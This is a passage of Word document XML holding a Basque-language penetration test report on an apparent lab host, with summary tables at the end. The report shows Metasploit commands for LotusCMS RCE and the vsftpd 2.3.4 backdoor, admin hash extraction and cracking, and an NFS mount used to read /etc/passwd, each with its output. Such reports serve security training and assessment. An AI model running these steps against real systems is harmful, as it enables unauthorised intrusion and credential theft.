          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>$ dirb http://192.168.10.22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Aurkitu dena:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:keepLines/>
        <w:widowControl/>
        <w:spacing w:after="120" w:line="269" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>/cms/ -&gt; LotusCMS 3.0 web aplikazioa</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>/cms/index.php?system=Admin -&gt; Admin login panela</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>/cms/index.php?page=index -&gt; Webgunearen orrialdea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Zergatik</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> garrantzitsua: Web enumeraziorik gabe, /cms/ direktorioa ez zen aurkituko, eta LotusCMS aplikazioaren ahultasuna ez zen ustiatuko.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:keepNext/>
        <w:widowControl/>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>3. FASEA: AHULTASUNEN ANALISIA ETA USTIAPENA (WEB)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Helburua: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LotusCMS-eko RCE ahultasuna identifikatu, Meterpreter sesio bat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> lortu eta, horren bidez, admin kredentzialak eskuratu.</w:t>
      </w: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t>3a Metasploit Framework — LotusCMS RCE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Tresna: Metasploit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 xml:space="preserve">Zer da: Metasploit Framework ahultasunen ustiapenerako plataforma bat da. CVE-2012-1623 ahultasuna ustiatzen du: LotusCMS-eko </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>eval(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>funtzioaren bidez PHP kodea exekutatzen du urrunetik.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Erabilitako exploit:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:keepLines/>
        <w:widowControl/>
        <w:spacing w:after="120" w:line="269" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>msf6 &gt; use exploit/multi/http/lcms_php_exec</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>msf6 &gt; set RHOSTS 192.168.10.22</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>msf6 &gt; set LHOST 192.168.10.11</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>msf6 &gt; set URI /cms/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>msf6 &gt; run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Lortutako emaitza:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:keepLines/>
        <w:widowControl/>
        <w:spacing w:after="120" w:line="269" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>[*] Meterpreter session</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1 opened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Meterpreter-ek zer ematen du (www-data erabiltzailearekin, EZ root):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● Urruneko shell zerbitzarian, web-erabiltzaile mailan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● Fitxategi sistema arakatzeko aukera (ls, cd, cat, upload, download)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● Prozesu eta sistema informazioa</w:t>
      </w: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lastRenderedPageBreak/>
        <w:t>3b Kredentzialen H</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>ash-aren Erauzketa eta Cracking-a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Tresna: Meterpreter + sha1sum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Zer da: Meterpreter sesioaren bidez (3a atala) admin kredentzialen SHA1 hash-a fitxategi-sisteman bertan aurkitu eta erauzi da. Ondoren, hash hori offline cracking bidez identifikatu da — ez d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>a login formularioan eskuzko saiakerarik egin, hash-a jakinik pasahitz-hautagaiak egiaztatu dira zuzenean.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Hash-aren erauzketa (Meterpreter bidez):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:keepLines/>
        <w:widowControl/>
        <w:spacing w:after="120" w:line="269" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>meterpreter &gt; cd /var/www/html/cms/data/users</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>meterpreter &gt; cat admin.dat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>9cb3b0f16b861d3c9a198c30d5f873c344</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>937d2c|administrator|admin@uni.eus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Hash-aren identifikazioa (offline cracking):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:keepLines/>
        <w:widowControl/>
        <w:spacing w:after="120" w:line="269" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>$ echo 'Admin123' | sha1sum</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>9cb3b0f16b861d3c9a198c30d5f873c344937d2c -</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t># Bat dator admin.dat fitxategiko hash-arekin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Admin panelean sarbidea:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:keepLines/>
        <w:widowControl/>
        <w:spacing w:after="120" w:line="269" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>URL: http://192.168.10.22/cms/inde</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>x.php?system=Admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Usuario: administrator Pasahitza: Admin123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Ondorioa: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Admin123 pasahitz oso arrunta zen eta SHA1 hash-a gatzik gabe gordeta zegoen, erauzketa eta identifikazioa oso azkar egin ahal izan zelarik. Honek pasahitz-politika oso ahularen eta ha</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>sh babesgabearen adierazle argia da.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:keepNext/>
        <w:widowControl/>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>4. FASEA: FTP BACKDOOR USTIAPENA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Helburua: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vsftpd 2.3.4-ren backdoor-a ustiatuta root shell bat lortu.</w:t>
      </w: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t>4 Metasploit — vsftpd 2.3.4 Backdoor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Tresna: Metasploit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 xml:space="preserve">Zer da: CVE-2011-2523. vsftpd 2.3.4-ren iturri-kodean </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>backdoor bat sartu zuten 2011n. Erabiltzaile-izenean ':)' karaktereak bidaliz gero, zerbitzariak 6200 portuan root shell bat irekitzen du, autentifikazio gabe.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Erabilitako komandoak:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:keepLines/>
        <w:widowControl/>
        <w:spacing w:after="120" w:line="269" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>msf6 &gt; use exploit/unix/ftp/vsftpd_234_backdoor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>msf6 &gt; set RHOSTS 192.168</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>.10.22</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>msf6 &gt; run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Emaitza:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:keepLines/>
        <w:widowControl/>
        <w:spacing w:after="120" w:line="269" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>[+] UID: uid=0(root) gid=0(root) groups=0(root)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>[*] Command shell session 1 opened -&gt; 192.168.10.22:6200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lastRenderedPageBreak/>
        <w:t>Egiaztapena:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:keepLines/>
        <w:widowControl/>
        <w:spacing w:after="120" w:line="269" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t># whoami -&gt; root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t># id -&gt; uid=0(root) gid=0(root) groups=0(root)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Efektua: Root-eko shell zuzenaren bidez sistema</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> osoa kontrolatua, inolako pribilegio-eskalatze urratsik behar izan gabe (ikus 6. Fasea).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:keepNext/>
        <w:widowControl/>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>5. FASEA: NFS ESPLOTAZIOA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Helburua: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NFS-en konfigurazio okerraren bidez zerbitzariaren sistema fitxategi osoa montatu eta datu sentikorrak eskuratu (irakurketa).</w:t>
      </w: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t>5 sh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>owmount + mount — NFS Fitxategi Sistema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Tresna: showmount / mount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Zer da NFS: NFS (Network File System) fitxategi sistemak sarean partekatzeko protokoloa da. Konfigurazio okerrarekin, edozein sarekideri sarbide zabala eman diezaioke fitxategi-sistemara.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1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> Esportazioen enumerazioa:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:keepLines/>
        <w:widowControl/>
        <w:spacing w:after="120" w:line="269" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>$ showmount -e 192.168.10.22</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Export list for 192.168.10.22:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>/ * &lt;- Sistema OSOA, EDONORI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>/home * &lt;- Etxe-direktorioak, EDONORI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2. Fitxategi sistema montatzea:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:keepLines/>
        <w:widowControl/>
        <w:spacing w:after="120" w:line="269" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>$ mkdir /tmp/nfs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>$ sudo mount -t nfs 192.168.10.22:/ /tmp/nfs -o noloc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>k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3. Datu sentikorren sarbidea (irakurketa egiaztatua):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:keepLines/>
        <w:widowControl/>
        <w:spacing w:after="120" w:line="269" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>$ ls /tmp/nfs -&gt; Sistema fitxategi osoa ikusgai</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>$ cat /tmp/nfs/etc/passwd -&gt; Erabiltzaile guztiak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Ahultasunaren zergatia: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● / direktorioa * (edozein IP) esportatua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 xml:space="preserve">● root_squash ez aktibatua -&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>idazketa-sarbide arriskua dago (proba honetan ez da idazketarik egiaztatu, irakurketa bakarrik)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● Autentifikaziorik ez</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:keepNext/>
        <w:widowControl/>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>6. FASEA: PRIBILEGIO-ESKALATZEA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Helburua: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Pentesting metodologia estandar orok fase hau barne hartzen du: hasierako sarbide mugatu bateti</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>k (adibidez, www-data erabiltzailetik) root/administratzaile mailara igarotzea.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Kasu honetan fase hau ez zen beharrezkoa izan: 4. Fasean (FTP backdoor) root maila ZUZENEAN lortu zen, inolako eskalatze teknikarik (SUID bitarrak, kernel exploit-ak, sudo gaiz</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">ki konfiguratuak, etab.) erabili gabe. Hori dela eta, LotusCMS RCE bidez lortutako www-data </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>sesioa (3a Fasea) ez zen root maila lortzeko erabili — bide hori kredentzialak lapurtzeko erabili zen soilik (3b Fasea).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Oharra: NFS-ren konfigurazio okerrak (5. Fa</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>sea) ere pribilegio-eskalatzerako bide alternatibo bat izan zitekeen (adibidez, root baimenekin SUID bitar bat idatziz /home/&lt;erabiltzaile&gt; bidez), baina proba honetan ez da teknika hori erabili edo egiaztatu.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:keepNext/>
        <w:widowControl/>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>7. ERASO MOTAK (LABURPENA)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2297"/>
        <w:gridCol w:w="4038"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E0233D">
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3024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Eraso Mota</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2297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Fasea</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4038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He</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>lburua</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E0233D">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="302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Urruneko Kode-Exekuzioa</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t>(RCE)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2297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3. Fasea</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="403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PHP kodea urrunetik exekutatu eta</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t>kredentzialak lapurtu</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E0233D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Backdoor Ustiapena</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="229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4. Fasea</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="403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Autentifikazio gabeko root shell</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t>zuzena lortu</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E0233D">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="302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Konfigurazio Okerraren</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t>Ustiapena</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2297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5. Fasea</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="403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Autentifikaziorik gabe fitxategi-</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>sistemara sarbidea lortu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p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:keepNext/>
        <w:widowControl/>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>8. AHULTASUN MOTAK (LABURPENA)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64"/>
        <w:gridCol w:w="4041"/>
        <w:gridCol w:w="2055"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E0233D">
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3264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Ahultasun Mota</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4041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Adibidea</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2055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CVE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E0233D">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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Software / Kodearen</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t>Ahultasuna (RCE)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4041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LotusCMS 3.0 (eval())</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2055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CVE-2012-1623</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E0233D">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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Backdoor / Atzeko Atea</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="40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vsftpd 2.3.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="205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CVE-2011-2523</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E0233D">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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Konfigurazio Okerra /</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t>Kudeaketa Ahula</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4041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 xml:space="preserve">NFS </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>esportazio mugagabea + Admin</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t>hash/pasahitz ahula</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2055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—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p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:keepNext/>
        <w:widowControl/>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>9. TRESNEN LABURPEN OSOA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78"/>
        <w:gridCol w:w="2418"/>
        <w:gridCol w:w="2418"/>
        <w:gridCol w:w="2345"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E0233D">
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2178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Tresna</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2418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Kategoria</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2418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Fasea</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2345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Helburua</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E0233D">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="217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Nmap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="241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Eskaneatzea</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="241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1 — Enumerazioa</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2345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Portuak, zerbitzuak,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t>bertsioak</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E0233D">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="21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dirb</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
